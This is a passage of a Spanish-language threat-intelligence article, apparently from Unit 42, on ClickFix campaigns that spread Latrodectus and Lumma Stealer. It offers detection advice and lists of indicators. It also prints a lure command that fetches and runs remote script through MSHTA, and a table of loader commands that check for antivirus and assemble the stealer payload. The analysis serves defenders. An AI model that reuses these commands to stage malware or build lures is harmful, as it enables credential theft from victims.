href=\"https:\/\/www.virustotal.com\/gui\/file\/aef5c150cfe8154ed290b293e30d552cfb9b40b3552369345c7c2f135b63aac4\/relations\" target=\"_blank\" rel=\"noopener\">Latrodectus<\/a>, que se deja caer como un archivo DLL malicioso (<span style=\"font-family: 'courier new', courier, monospace;\">libcef.dll<\/span>), y un binario leg\u00edtimo que carga la DLL. Esto se demuestra en la Figura\u00a011.<\/p>\n<figure id=\"attachment_157777\" aria-describedby=\"caption-attachment-157777\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157777 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_Latrodectus-Infection-Chain-748x440.png\" alt=\"Diagrama de la cadena de infecci\u00f3n de Latrodectus, que comienza con un sitio web leg\u00edtimo comprometido y se mueve a trav\u00e9s de la t\u00e1ctica ClickFix, lo que lleva a la descarga y ejecuci\u00f3n de un archivo EXE y un c\u00f3digo shell malicioso. \" width=\"1000\" height=\"588\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_Latrodectus-Infection-Chain-748x440.png 748w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_Latrodectus-Infection-Chain-1190x700.png 1190w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_Latrodectus-Infection-Chain-768x452.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_Latrodectus-Infection-Chain-1536x903.png 1536w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_Latrodectus-Infection-Chain-2048x1205.png 2048w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-157777\" class=\"wp-caption-text\">Figura 11. La cadena de infecci\u00f3n de Latrodectus.<\/figcaption><\/figure>\n<p>Cuando el archivo leg\u00edtimo carga lateralmente la DLL maliciosa para Latrodectus, inyecta shellcode en s\u00ed mismo.<\/p>\n<p>En una <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2025-05-16-IOCs-on-recent-ClickFix-activity.txt\" target=\"_blank\" rel=\"noopener\">entrada de Timely Threat Intelligence <\/a>de mayo de 2025, analizamos una campa\u00f1a Latrodectus parecida, en la que Lumma Stealer era la carga \u00fatil final de la cadena de ataque completa.<\/p>\n<h3><a id=\"post-157571-_yumjvjhpior\"><\/a>Campa\u00f1a de typosquatting de Lumma Stealer<\/h3>\n<p>Mientras que los atacantes que distribuyen Lumma Stealer comenzaron a utilizar la t\u00e9cnica de infecci\u00f3n ClickFix <a href=\"https:\/\/www.esentire.com\/security-advisories\/lumma-stealer-clickfix-distribution\" target=\"_blank\" rel=\"noopener\">a finales de 2024<\/a>hemos visto un aumento en los intentos de infecci\u00f3n ClickFix para Lumma Stealer tan recientemente como abril de 2025. En campa\u00f1as recientes, los atacantes que distribuyen Lumma Stealer han afectado a una amplia gama de sectores, entre ellos los siguientes:<\/p>\n<ul>\n<li>Automotriz<\/li>\n<li>Energ\u00eda<\/li>\n<li>TI<\/li>\n<li>Software<\/li>\n<\/ul>\n<p>En nuestra investigaci\u00f3n de una de estas campa\u00f1as de ClickFix, descubrimos que a los objetivos se les pide que copien un comando MSHTA \u00fanico con la siguiente estructura: <span style=\"font-family: 'courier new', courier, monospace;\">mshta xxxx[.]co\/xxxxxx =+\\xxx.<\/span><\/p>\n<p>Los atacantes dan a cada objetivo una cadena identificadora espec\u00edfica, que pueden utilizar para recibir la carga \u00fatil una vez. Sin embargo, los URI que nuestros investigadores comprobaron ya no entregaban las cargas \u00fatiles despu\u00e9s de la infecci\u00f3n.<\/p>\n<p>Al ejecutar el script ClickFix, el script redirige al espectador a una versi\u00f3n <a href=\"https:\/\/unit42.paloaltonetworks.com\/cybersquatting\/\">typosquatted<\/a> de los dominios IP Logger <span style=\"font-family: 'courier new', courier, monospace;\">iplogger[.]org<\/span> e <span style=\"font-family: 'courier new', courier, monospace;\">iplogger[.]com<\/span>. IP Logger es un servicio de acortamiento de URL y seguimiento de IP que crea enlaces para registrar informaci\u00f3n sobre los usuarios, como la siguiente:<\/p>\n<ul>\n<li>Direcciones IP<\/li>\n<li>Geolocalizaci\u00f3n<\/li>\n<li>Detalles del dispositivo<\/li>\n<li>Comportamiento de navegaci\u00f3n<\/li>\n<\/ul>\n<p>El dominio typosquatted controlado por los atacantes es <span style=\"font-family: 'courier new', courier, monospace;\">iplogger[.]co<\/span>, y la p\u00e1gina de este dominio est\u00e1 camuflada como un servicio conocido y leg\u00edtimo.<\/p>\n<p>En todos los casos de la campa\u00f1a, observamos que el comando MSHTA descargaba un script PowerShell codificado, que iniciaba una infecci\u00f3n Lumma Stealer. En la Figura\u00a012 se muestra toda la cadena de infecci\u00f3n.<\/p>\n<figure id=\"attachment_157788\" aria-describedby=\"caption-attachment-157788\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157788 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_LummaStealer-Diagram-658x440.png\" alt=\"Infecci\u00f3n Lumma Stealer que describe el proceso de un ataque de malware en el que intervienen entidades como ClickFix, Encoded PowerShell, Lumma Stealer, y diversas funciones como contactar con el servidor de Mando y control (C2), crear ejecutables y detectar productos de seguridad. En el gr\u00e1fico se muestran las conexiones y acciones como la ca\u00edda de recursos y los comandos de ejecuci\u00f3n a lo largo del ciclo de vida del ataque.\" width=\"1000\" height=\"668\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_LummaStealer-Diagram-658x440.png 658w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_LummaStealer-Diagram-1047x700.png 1047w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_LummaStealer-Diagram-768x513.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_LummaStealer-Diagram-1536x1027.png 1536w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_LummaStealer-Diagram-2048x1369.png 2048w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-157788\" class=\"wp-caption-text\">Figura 12. La cadena de infecci\u00f3n Lumma Stealer.<\/figcaption><\/figure>\n<p>Cada enlace controlado por el atacante aloja un comando PowerShell fuertemente ofuscado y codificado en Base64 que, en \u00faltima instancia, conduce a la ca\u00edda y ejecuci\u00f3n de un stager malicioso de Lumma Stealer llamado <span style=\"font-family: 'courier new', courier, monospace;\">PartyContinued.exe<\/span>. Este ejecutable se aloja en: <span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/pub-&lt;dynamically generated number string&gt;.r2[.]dev <\/span>y se nombra para que parezca una URL de desarrollador leg\u00edtima.<\/p>\n<p>Cuando se inicia <span style=\"font-family: 'courier new', courier, monospace;\">PartyContinued.exe<\/span>, se configura un nuevo m\u00e9todo de carga de Lumma que utiliza un lenguaje de scripting llamado <a href=\"https:\/\/www.autoitscript.com\/wiki\/AutoIt_and_Malware\" target=\"_blank\" rel=\"noopener\">AutoIt<\/a>. Esta versi\u00f3n de Lumma Stealer es parecida a las anteriores, pero incluye un nuevo archivo CAB (Microsoft cabinet archive) llamado <span style=\"font-family: 'courier new', courier, monospace;\">Boat.pst<\/span>. Este archivo CAB se incluye dentro de <span style=\"font-family: 'courier new', courier, monospace;\">PartyContinued.exe<\/span> y contiene el resto del contenido que se utiliza para crear un motor de scripts AutoIt3 y un script AutoIt que ejecuta para Lumma Stealer.<\/p>\n<p>En la Tabla\u00a01 se resumen los comandos que ejecuta el cargador y su finalidad:<\/p>\n<table style=\"width: 100.714%; height: 648px;\">\n<tbody>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px; text-align: center; width: 47.2986%;\"><strong>Comando<\/strong><\/td>\n<td style=\"height: 24px; text-align: center; width: 35.5319%;\"><strong>Descripci\u00f3n<\/strong><\/td>\n<td style=\"height: 24px; text-align: center; width: 16.9909%;\"><strong>Prop\u00f3sito<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">lista de tareas | findstr \/I \"opssvc wrsa\"<\/span><\/td>\n<td style=\"height: 72px; width: 35.5319%;\">Realiza una b\u00fasqueda insensible a may\u00fasculas y min\u00fasculas de <span style=\"font-family: 'courier new', courier, monospace;\">opssvc<\/span> o <span style=\"font-family: 'courier new', courier, monospace;\">wrsa<\/span> en el nombre de un proceso en ejecuci\u00f3n.<\/td>\n<td style=\"height: 72px; width: 16.9909%;\">Detecci\u00f3n de software de seguridad para endpoints<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">lista de tareas | findstr \"bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn\"<\/span><\/td>\n<td style=\"height: 48px; width: 35.5319%;\">Busca varias cadenas en los procesos en ejecuci\u00f3n.<\/td>\n<td style=\"height: 48px; width: 16.9909%;\">Detecci\u00f3n de software de seguridad para endpoints<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c md 386354<\/span><\/td>\n<td style=\"height: 48px; width: 35.5319%;\">Crea un directorio para guardar el malware en el disco.<\/td>\n<td style=\"height: 48px; width: 16.9909%;\">Fijar la ubicaci\u00f3n para la extracci\u00f3n de la carga \u00fatil<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">extrac32 \/Y \/E Boat.pst<\/span><\/td>\n<td style=\"height: 72px; width: 35.5319%;\">Extrae los archivos del archivo<span style=\"font-family: 'courier new', courier, monospace;\">.cab<\/span> llamado <span style=\"font-family: 'courier new', courier, monospace;\">Boat.pst<\/span>, sobrescribiendo los archivos existentes (<span style=\"font-family: 'courier new', courier, monospace;\">\/Y<\/span>) y extrayendo todos los archivos (<span style=\"font-family: 'courier new', courier, monospace;\">\/E<\/span>).<\/td>\n<td style=\"height: 72px; width: 16.9909%;\">Extracci\u00f3n de la carga \u00fatil<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">set \/p =\"MZ\" &gt; 386354\\Slovenia[.]com &lt;nul<\/span><\/td>\n<td style=\"height: 48px; width: 35.5319%;\">Crea un archivo llamado <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span> en el directorio <span style=\"font-family: 'courier new', courier, monospace;\">386354<\/span> que contiene dos bytes para los caracteres <span style=\"font-family: 'courier new', courier, monospace;\">MZ<\/span>.<\/td>\n<td style=\"height: 48px; width: 16.9909%;\">Construir el ejecutor AutoIt3<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">findstr \/V \"Tr\" Bell &gt;&gt; 386354\\Slovenia[.]com<\/span><\/td>\n<td style=\"height: 72px; width: 35.5319%;\">Agrega todas las l\u00edneas del archivo extra\u00eddo llamado <span style=\"font-family: 'courier new', courier, monospace;\">Bell<\/span> que no contengan la cadena <span style=\"font-family: 'courier new', courier, monospace;\">Tr<\/span> (distingue may\u00fasculas de min\u00fasculas) al archivo <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span>.<\/td>\n<td style=\"height: 72px; width: 16.9909%;\">Construir el ejecutor AutoIt3<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c copy \/b 386354\\Slovenia[.]com + Costura + Monetario + Cubierto + Salud + P\u00e9rdida + Intel + Escape + Tramadol + Aparato 386354\\Slovenia[.]com<\/span><\/td>\n<td style=\"height: 72px; width: 35.5319%;\">Agrega otros archivos extra\u00eddos para terminar de crear un archivo binario con copy <span style=\"font-family: 'courier new', courier, monospace;\">\/b<\/span>. El resultado es una copia de <span style=\"font-family: 'courier new', courier, monospace;\">AutoIt3.exe<\/span>, cuyo nombre es <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span>.<\/td>\n<td style=\"height: 72px; width: 16.9909%;\">Construir el ejecutor AutoIt3<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c copy \/b ..\\Presently.pst + ..\\Instantly.pst + ..\\Roy.pst + ..\\Tolerance.pst + ..\\Mailto.pst + ..\\Marco.pst + ..\\Mint.pst G<\/span><\/td>\n<td style=\"height: 72px; width: 35.5319%;\">Crea un binario llamado <span style=\"font-family: 'courier new', courier, monospace;\">G<\/span> que <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span> ejecutar\u00e1 como un script compilado de AutoIt v3 (<span style=\"font-family: 'courier new', courier, monospace;\">.a3x<\/span>).<\/td>\n<td style=\"height: 72px; width: 16.9909%;\">Construir la carga \u00fatil del Lumma Stealer (ejecuci\u00f3n binaria como archivo <span style=\"font-family: 'courier new', courier, monospace;\">.a3x<\/span><\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"height: 48px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">iniciar Eslovenia[.]com G<\/span><\/td>\n<td style=\"height: 48px; width: 35.5319%;\">Comando para que el ejecutor AutoIt3 ejecute el binario para Lumma Stealer como un archivo <span style=\"font-family: 'courier new', courier, monospace;\">.a3x<\/span>.<\/td>\n<td style=\"height: 48px; width: 16.9909%;\">Cargar\/ejecutar Lumma Stealer<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px; width: 47.2986%;\"><span style=\"font-family: 'courier new', courier, monospace;\">elecci\u00f3n \/d y \/t 5<\/span><\/td>\n<td style=\"height: 72px; width: 35.5319%;\">Comando para seleccionar s\u00ed (<span style=\"font-family: 'courier new', courier, monospace;\">y<\/span>) para la opci\u00f3n por defecto (<span style=\"font-family: 'courier new', courier, monospace;\">\/d<\/span>) para comandos en el archivo <span style=\"font-family: 'courier new', courier, monospace;\">.bat<\/span> despu\u00e9s de esperar 5 segundos (<span style=\"font-family: 'courier new', courier, monospace;\">\/t 5<\/span>).<\/td>\n<td style=\"height: 72px; width: 16.9909%;\">Permite que Lumma Stealer se ejecute sin interacci\u00f3n del usuario<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><em>Tabla\u00a01. Comandos ejecutados por el cargador para Lumma Stealer.<\/em><\/p>\n<p>Como se muestra en la tabla, <span style=\"font-family: 'courier new', courier, monospace;\">Slovenia[.]com<\/span> es una copia del motor de scripts <span style=\"font-family: 'courier new', courier, monospace;\">AutoIt3.exe<\/span> que ejecuta un binario que se ejecuta como un script AutoIt (<span style=\"font-family: 'courier new', courier, monospace;\">.a3x<\/span>) llamado <span style=\"font-family: 'courier new', courier, monospace;\">G<\/span>, que es responsable de las siguientes etapas del ataque. Esta versi\u00f3n de Latrodectus recolecta informaci\u00f3n sensible, como contrase\u00f1as de navegadores basados en Chromium, e intenta filtrarlas a un servidor C2 en <span style=\"font-family: 'courier new', courier, monospace;\">sumeriavgv[.]digital<\/span>.<\/p>\n<h2><a id=\"post-157571-_8fhl6fppv1qw\"><\/a>A la caza de infecciones ClickFix<\/h2>\n<p>Los ataques ClickFix suelen dejar rastros f\u00e1cilmente detectables, sobre todo cuando las personas que ven estos se\u00f1uelos no est\u00e1n familiarizadas con la apertura de interfaces administrativas, por lo que es m\u00e1s probable que peguen una cadena de comandos maliciosa en una ventana Ejecutar.<\/p>\n<h3><a id=\"post-157571-_6cpshy6e1qzz\"><\/a>Revisi\u00f3n de artefactos RunMRU<\/h3>\n<p>Windows mantiene una clave de registro que almacena los comandos ejecutados m\u00e1s recientemente desde la ventana Ejecutar (Win + R), llamada <span style=\"font-family: 'courier new', courier, monospace;\">RunMRU<\/span>:<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU<\/span><\/p>\n<p>Esta clave del registro guarda todos los comandos que se ejecutan desde la ventana Ejecutar, lo que permite a los analistas analizar estas entradas en busca de indicios de uso sospechoso.<\/p>\n<p>Algunos indicadores clave de contenidos <span style=\"font-family: 'courier new', courier, monospace;\">RunMRU<\/span> sospechosos podr\u00edan ser los siguientes:<\/p>\n<ul>\n<li>Contenido ofuscado<\/li>\n<li>Palabras clave relacionadas con la descarga y ejecuci\u00f3n de cargas \u00fatiles procedentes de dominios desconocidos o sospechosos<\/li>\n<li>Palabras clave que indican llamadas a interfaces administrativas<\/li>\n<\/ul>\n<p>Estas entradas sugieren que alguien podr\u00eda haber activado manualmente dichos comandos, lo que concuerda con el flujo de infecci\u00f3n de ClickFix.<\/p>\n<h3><a id=\"post-157571-_q9pu4ba25awd\"><\/a>Detecci\u00f3n de Win + X ClickFix<\/h3>\n<p>Algunos atacantes pretenden evitar exponer su actividad en la clave de registro <span style=\"font-family: 'courier new', courier, monospace;\">RunMRU<\/span>. En su lugar, presentan instrucciones para iniciar un terminal para PowerShell (Windows\u00a011) o S\u00edmbolo del sistema (Windows\u00a010) mediante <span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span> para el men\u00fa de acceso r\u00e1pido. Seg\u00fan un <a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\" target=\"_blank\" rel=\"noopener\">informe de marzo de 2025<\/a>, los atacantes que distribu\u00edan Havoc utilizaban esta variante Win+X de ClickFix.<\/p>\n<p>Los cazadores de amenazas pueden buscar indicios de esta t\u00e9cnica <span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span> ClickFix con la telemetr\u00eda EDR o los registros de eventos de Windows, concretamente:<\/p>\n<ul>\n<li><strong>Evento de seguridad ID 4688 (creaci\u00f3n de proceso): <\/strong>Busque <span style=\"font-family: 'courier new', courier, monospace;\">powershell.exe<\/span> generado por <span style=\"font-family: 'courier new', courier, monospace;\">explorer.exe<\/span>, en correlaci\u00f3n con Event ID 4663 (Object Access) de archivos bajo la carpeta <span style=\"font-family: 'courier new', courier, monospace;\">%LocalAppData%\\Microsoft\\Windows\\WinX\\<\/span>.<\/li>\n<li><strong>Patrones de uso de shell:<\/strong> Las sesiones elevadas de PowerShell invocadas poco despu\u00e9s de inicios de sesi\u00f3n interactivos, seguidas de conexiones de red o procesos secundarios sospechosos (por ejemplo, <span style=\"font-family: 'courier new', courier, monospace;\">certutil.exe<\/span>, <span style=\"font-family: 'courier new', courier, monospace;\">mshta.exe<\/span> y <span style=\"font-family: 'courier new', courier, monospace;\">rundll32.exe<\/span>), suelen ser se\u00f1ales de alarma.<\/li>\n<li><strong>Control del portapapeles:<\/strong> Dado que los se\u00f1uelos de ClickFix dependen de que las v\u00edctimas potenciales peguen contenido malicioso del portapapeles, podemos correlacionar la actividad de pegado con la ejecuci\u00f3n de PowerShell poco despu\u00e9s de que el usuario teclee <span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span>.<\/li>\n<\/ul>\n<h2><a id=\"post-157571-_2an8ryq91inv\"><\/a>Conclusi\u00f3n<\/h2>\n<p>La t\u00e9cnica ClickFix es una amenaza creciente, con enfoques din\u00e1micamente cambiantes en su aplicaci\u00f3n. Los actores de amenazas aprovechan ClickFix en ataques contra organizaciones, explotando el error humano para su propagaci\u00f3n y persistencia.<\/p>\n<p>En este art\u00edculo se analizaban tres destacadas campa\u00f1as de ClickFix (NetSupport RAT, Latrodectus y Lumma Stealer), todas ellas en constante adaptaci\u00f3n e incorporaci\u00f3n de nuevas t\u00e9cnicas.<\/p>\n<p>Las metodolog\u00edas pr\u00e1cticas para cazar y detectar se\u00f1uelos ClickFix incluyen investigar la telemetr\u00eda EDR o los registros de eventos de Windows en busca de eventos, actividades y patrones sospechosos.<\/p>\n<p>Abordar de forma proactiva esta amenaza en evoluci\u00f3n es vital para la seguridad permanente de las organizaciones. Con este fin, deben realizarse esfuerzos para aumentar la concienciaci\u00f3n educando al personal para que desconf\u00ede de los se\u00f1uelos de ClickFix. Esto debe hacerse al tiempo que se establecen medidas de defensa y vigilancia basadas en nuestras sugerencias de caza.<\/p>\n<p>Los clientes de Palo Alto Networks est\u00e1n mejor protegidos frente a las amenazas mencionadas gracias a los siguientes productos:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">WildFire avanzado<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">El URL Filtering avanzado<\/a> y <a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">la Seguridad DNS avanzada<\/a> detectan ataques ClickFix, como los comentados en este blog, con nuestros rastreadores web de seguridad offline mediante la detecci\u00f3n de comandos maliciosos inyectados en el b\u00fafer del portapapeles por JavaScript malicioso.<\/li>\n<li><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a> y <a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\">XSIAM<\/a> previenen todas las campa\u00f1as y programas maliciosos mencionados en este art\u00edculo mediante el m\u00f3dulo Protecci\u00f3n contra amenazas de comportamiento.<\/li>\n<\/ul>\n<p>Si cree que puede haber resultado vulnerado o tiene un problema urgente, p\u00f3ngase en contacto con el <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">equipo de respuesta ante incidentes de Unit\u00a042<\/a> o llame al:<\/p>\n<ul>\n<li>Norteam\u00e9rica: llamada gratuita: +1\u00a0(866)\u00a0486-4842 (866.4.UNIT42)<\/li>\n<li>Reino Unido: +44.20.3743.3660<\/li>\n<li>Europa y Oriente Medio: +31.20.299.3130<\/li>\n<li>Asia: +65.6983.8730<\/li>\n<li>Jap\u00f3n: +81.50.1790.0200<\/li>\n<li>Australia: +61.2.4062.7950<\/li>\n<li>India: 00080005045107<\/li>\n<\/ul>\n<p>Palo Alto Networks ha compartido estos resultados con nuestros compa\u00f1eros de Cyber Threat Alliance (CTA). Los miembros de CTA utilizan esta inteligencia para implementar r\u00e1pidamente medidas de protecci\u00f3n para sus clientes y desarticular sistem\u00e1ticamente a los ciberdelincuentes. Obtenga m\u00e1s informaci\u00f3n sobre <a href=\"https:\/\/www.cyberthreatalliance.org\" target=\"_blank\" rel=\"noopener\">Cyber Threat Alliance<\/a>.<\/p>\n<h2><a id=\"post-157571-_v8176g40kstn\"><\/a>Indicadores de vulneraci\u00f3n<\/h2>\n<p>Hashes SHA256 del ejemplo de Lumma Stealer<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nombre de archivo PartyContinued.exe: 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nombre de archivo Boat.pst (un archivo CAB): 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7<\/span><\/li>\n<\/ul>\n<p>Ejemplo de robo de dominios de Lumma<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">iplogger[.]co<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">stuffgull[.]top<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">sumeriavgv[.]digital<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-626890a630d8418ea6c2ef0fa17f02ef.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-a5a2932dc7f143499b865f8580102688.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-7efc089d5da740a994d1472af48fc689.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">agroeconb[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">animatcxju[.]live<\/span><\/li>\n<\/ul>\n<p>Hashes SHA256 del ejemplo Latrodectus<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nombre de archivo libcef.dll: 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Descargador de PowerShell: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Descargador de JavaScript: 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Descargador de JavaScript: 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559<\/span><\/li>\n<\/ul>\n<p>Ejemplo de URL C2 de Latrodectus<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/webbs[.]live\/on\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/diab[.]live\/up\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/mhbr[.]live\/do\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/decr[.]live\/j\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/lexip[.]live\/n\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/rimz[.]live\/u\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/byjs[.]live\/v\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/btco[.]live\/r\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/izan[.]live\/r\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/k.veuwb[.]live\/234<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/r.netluc[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">heyues[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/k.mailam[.]live\/234234<\/span><\/li>\n<\/ul>\n<p>Ejemplo de SHA256 Hashes de NetSupport RAT<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nombre de archivo data_3.bin (XOR cifrado stager): 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nombre de archivo data_4.bin (c\u00f3digo shell cifrado XOR): 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nombre de archivo msvcp140.dll (cargador): CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mutex del cargador de NetSupport:<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">nx0kFgSPY8SDVhOMjmNgW<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">libsqlite3-0.dll: 506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Ubicaci\u00f3n del archivo C:\\ProgramData\\SecurityCheck_v1\\client32.exe: 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7<\/span><\/li>\n<\/ul>\n<p>Ejemplo de dominios para el cargador de NetSupport RAT:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">oktacheck.it[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">doccsign.it[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">docusign.sa[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">dosign.it[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">loyalcompany[.]net<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">leocompany[.]org<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, 